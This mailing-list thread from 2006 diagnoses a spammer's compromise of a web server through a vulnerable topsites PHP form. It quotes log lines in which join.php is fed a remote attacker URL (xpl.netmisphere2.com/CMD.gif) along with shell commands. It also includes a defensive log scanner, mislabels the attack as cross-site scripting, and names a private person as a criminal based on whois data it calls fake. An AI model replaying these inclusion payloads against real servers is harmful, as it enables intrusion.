-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
On Tue, 23 May 2006 00:14:32 +0000 replies-lists-redhat@listmail.innovate.net wrote:
I haven't been following this topic in great detail, but I suspect that you have a form on your site that is being exploited for "form spam". If you're not familiar with this, search Google for "form spam".
- Rick
Rick, thank you. No, I have not heard of this.
On Mon, 2006-05-22 at 23:11 -0400, CodeHeads wrote:
I don't think that's what this is. Form spam takes advantage of poorly-coded mail/contact forms and uses them to send mail to recipients other than those intended by the form designer.
What's happening here is that the spammer is running their own code (downloaded into /tmp) to send the mail, a rather more serious situation.
Paul.
On Tue, 2006-05-23 at 02:45, Paul Howarth wrote:
If you have ssh access open there's a fair chance that someone has done a brute-force password guess. There is a lot of that going around. Or you didn't apply all of the current updates before exposing the system to the internet.
On Tue, 23 May 2006, Les Mikesell wrote:
> On Tue, 2006-05-23 at 02:45, Paul Howarth wrote:
> > I don't think that's what this is. Form spam takes advantage of poorly-coded mail/contact forms and uses them to send mail to recipients other than those intended by the form designer.
> > What's happening here is that the spammer is running their own code (downloaded into /tmp) to send the mail, a rather more serious situation.
An old version of awstats will get you into this club, as will some of the PHP-based forum programs.
All it takes is for someone to install one of these in a document root and not keep up with the updates. It is insanely trivial to exploit one of these boxes. It even gets logged in the http logs for all to see. The hardest part is figuring out when it actually happened so you can find it in the logs.
> If you have ssh access open there's a fair chance that someone has done a brute-force password guess. There is a lot of that going around. Or you didn't apply all of the current updates before exposing the system to the internet.
I suspect if ssh had been compromised that the user would have been something other than apache. The passwd entry for apache generally looks something like this: apache:x:48:48:Apache:/var/www:/sbin/nologin. Given this entry an ssh login as apache would not be possible via brute-force passwd attack vectors.
Regards,
Tom Diehl tdiehl@rogueind.com Spamtrap address mtd123@rogueind.com
On Tue, 23 May 2006 09:27:01 -0400 (EDT) Tom Diehl tdiehl@rogueind.com wrote:
I looked in those logs and there is none of that. I have ssh turned off and sudo uninstalled.
On Tue, 23 May 2006 08:00:06 -0500 Les Mikesell lesmikesell@gmail.com wrote:
ssh is turned off.
On Tue, 23 May 2006 08:45:30 +0100 Paul Howarth paul@city-fan.org wrote:
I might not know too much but I really think they are using my forms. I found quite a few log entries. Here are a few.
81.199.173.8 - - [22/May/2006:18:57:51 -0400] "POST /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://www.tiffefermaintfashion.com/gbook/tmp/xzblog.txt? HTTP/1.0" 200 5923
AOL:
172.179.33.217 - - [21/May/2006:07:58:01 -0400] "GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=id HTTP/1.1" 200 2374
172.179.33.217 - - [21/May/2006:07:58:20 -0400] "GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=w HTTP/1.1" 200 2412
172.179.33.217 - - [21/May/2006:07:58:34 -0400] "GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=cd%20/var/tmp HTTP/1.1" 200 2323
And the xpl.netmisphere2.com site has hacking information: http://xpl.netmisphere2.com/ I think this outta be illegal!!
On Tue, 2006-05-23 at 11:25 -0400, CodeHeads wrote:
Looks like an exploit of a cross-site scripting vulnerability in your join.php form. http://xpl.netmisphere2.com/CMD.gif is the cracker's PHP script that gets injected into your form; it's not an image at all.
You need to turn off that form until you can get a fixed version of that application. And of course reinstall that system.
Paul.
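The log entries above show a full URL being fed into join.php's CONFIG[path] parameter, and Tom noted that the hard part is finding when it happened in the logs. The following is an added example, not code from the thread, of a small Python scanner that flags access-log requests carrying a remote URL in a query-parameter value and reports the earliest hit per client; the sample lines are constructed from three of the quoted entries plus one benign request.

```python
# Added example, not code from the thread: flag access-log requests that pass a
# remote URL as a query-parameter value (the join.php pattern quoted above) and
# report the earliest hit per client, i.e. when the box was first poked at.
import re
from datetime import datetime
from urllib.parse import parse_qsl

# Common/combined log prefix: client ident user [timestamp] "METHOD target proto" status bytes
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<bytes>\S+)')
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

# Constructed sample: three of the entries quoted in the thread plus one benign request.
SAMPLE_LOG = [
    '81.199.173.8 - - [22/May/2006:18:57:51 -0400] "POST /topsites/sources/join.php?FORM%5burl%5d=owned'
    '&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://www.tiffefermaintfashion.com/gbook/tmp/xzblog.txt? HTTP/1.0" 200 5923',
    '172.179.33.217 - - [21/May/2006:07:58:01 -0400] "GET /topsites/sources/join.php?FORM%5burl%5d=owned'
    '&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=id HTTP/1.1" 200 2374',
    '172.179.33.217 - - [21/May/2006:07:58:34 -0400] "GET /topsites/sources/join.php?FORM%5burl%5d=owned'
    '&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=cd%20/var/tmp HTTP/1.1" 200 2323',
    '10.0.0.5 - - [21/May/2006:08:00:00 -0400] "GET /topsites/index.php?page=2 HTTP/1.1" 200 4096',
]

def parse_line(line):
    """Parse one log line into a dict (timestamp as aware datetime); None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec

def remote_url_params(target):
    """Names of query parameters whose URL-decoded value is a remote URL (the remote-include indicator)."""
    query = target.partition("?")[2]  # everything after the first '?', nested URLs included
    return [k for k, v in parse_qsl(query, keep_blank_values=True)
            if v.lower().startswith(REMOTE_SCHEMES)]

def find_rfi_hits(lines):
    """(timestamp, client, target, flagged params) for each suspicious line, oldest first."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec and (params := remote_url_params(rec["target"])):
            hits.append((rec["ts"], rec["ip"], rec["target"], params))
    return sorted(hits)

def earliest_per_client(hits):
    """Map each client address to the timestamp of its first flagged request."""
    first = {}
    for ts, ip, _, _ in hits:
        first[ip] = min(ts, first.get(ip, ts))
    return first
```

A legitimate URL-valued field (a topsite's own "url" form field, say) will also match, so treat hits as triage leads and allowlist such parameters when running this over a real log.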
On Tue, 23 May 2006 16:39:20 +0100 Paul Howarth paul@city-fan.org wrote:
Thanks Paul, that is what I thought. I am writing my own topsites anyway, so that is no big deal. I will be deleting the other one.
CodeHeads wrote:
> And the xpl.netmisphere2.com site has hacking information: http://xpl.netmisphere2.com/ I think this outta be illegal!!
The registrar and registrant are both in France, and yes it is illegal.
The criminal's name is Canale Jeremy and he lives in Paris.
His fake registrant contact data should be enough to have his domain shut down, if you LART him upstream, citing false/incomplete contact data as the complaint:
###### Much of what follows is fake or incomplete ######
Server Used: [ whois.ovh.com ]
xpl.netmisphere2.com = [ 82.237.120.143 ]
local time    : Monday 05-Jun-2006 03:16:38 CEST
last modified : Saturday 29-Oct-2005 00:24:16 CEST
domaine       : netmisphere2.com
request from  : 206.117.161.80:3939

domain:       NETMISPHERE2.COM
owner:
person:       Canale Jeremy
address:      xxx
adresse:      PAris 74 007
adresse:      FR
phone:        17
fax:          cddc@cdcd.cdee
admin-c:      CJ6263-OVH
tech-c:       CJ6263-OVH
bill-c:       CJ6263-OVH
nserver:      ns1.netmisphere2.com
nserver:      ns2.sivit.org
created:      2005-07-07 14:00:00
expires:      2006-07-07 20:57:50
changed:      2005-07-07 21:16:07

nic-hdl:      CJ6263-OVH
person:       jtemmerde pffff
organisation: T-nul
address:      chez ta mere
address:      Obernai 16 prout
adresse:      FR
phone:        17
fax:          cdcd@fefe.com
created:      2005-07-07 20:52:03
changed:      2005-10-29 00:21:14
############

###### But he can't hide his upstream provider ######
role:         Administrative Contact for ProXad
address:      Free SAS / ProXad
address:      8, rue de la Ville L'Eveque
address:      75008 Paris
phone:        +33 1 73 50 20 00
fax-no:       +33 1 73 50 25 01
remarks:      trouble: Information: http://www.proxad.net/
remarks:      trouble: Spam/Abuse requests: abuse[AT]proxad.net
############